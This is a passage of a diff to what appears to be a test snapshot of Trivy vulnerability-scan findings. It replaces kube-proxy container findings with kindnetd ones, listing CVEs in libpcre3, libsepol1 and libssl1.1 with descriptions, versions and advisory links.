"2:8.39-13", "packageName": "libpcre3", "references": [ "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", @@ -161233,7 +161634,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ @@ -161291,9 +161692,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-7245", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://www.securityfocus.com/bid/97067", @@ -161307,7 +161708,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ @@ -161349,9 +161750,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-7246", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://www.securityfocus.com/bid/97067", @@ -161365,7 +161766,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ @@ -161407,9 +161808,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-20838", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://seclists.org/fulldisclosure/2020/Dec/32", @@ -161435,7 +161836,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ @@ -161525,122 +161926,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9893", - "installedVersion": "2.3.3-4", - "packageName": "libseccomp2", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", - "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", - "https://access.redhat.com/errata/RHSA-2019:3624", - "https://access.redhat.com/security/cve/CVE-2019-9893", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", - "https://github.com/seccomp/libseccomp/issues/139", - "https://linux.oracle.com/cve/CVE-2019-9893.html", - "https://linux.oracle.com/errata/ELSA-2019-3624.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", - "https://seclists.org/oss-sec/2019/q1/179", - "https://security.gentoo.org/glsa/201904-18", - "https://ubuntu.com/security/notices/USN-4001-1", - "https://ubuntu.com/security/notices/USN-4001-2", - "https://usn.ubuntu.com/4001-1/", - "https://usn.ubuntu.com/4001-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-9893", - "https://www.openwall.com/lists/oss-security/2019/03/15/1", - ], - }, - "category": "Vulnerability", - "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "libseccomp: incorrect generation of syscall filters in libseccomp", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9893", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", - }, - { - "type": "URL", - "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2019:3624", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://github.com/seccomp/libseccomp/issues/139", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://seclists.org/oss-sec/2019/q1/179", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/201904-18", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-2", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4001-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4001-2/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36084", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36084", @@ -161667,7 +161955,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ @@ -161761,9 +162049,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36085", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36085", @@ -161790,7 +162078,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ @@ -161884,9 +162172,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36086", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36086", @@ -161913,7 +162201,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "use-after-free in cil_reset_classpermission()", "references": [ @@ -162007,9 +162295,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36087", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36087", @@ -162037,7 +162325,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ @@ -162134,148 +162422,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", - }, - { - "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", - }, - { - "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-1292", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2022:6224", @@ -162319,7 +162469,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "c_rehash script allows command injection", "references": [ @@ -162397,221 +162547,19 @@ and the severity is therefore considered low.", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - }, - { - "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", - ], - }, - "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "the c_rehash script allows command injection", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", }, { "type": "URL", @@ -162619,172 +162567,27 @@ and the severity is therefore considered low.", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - 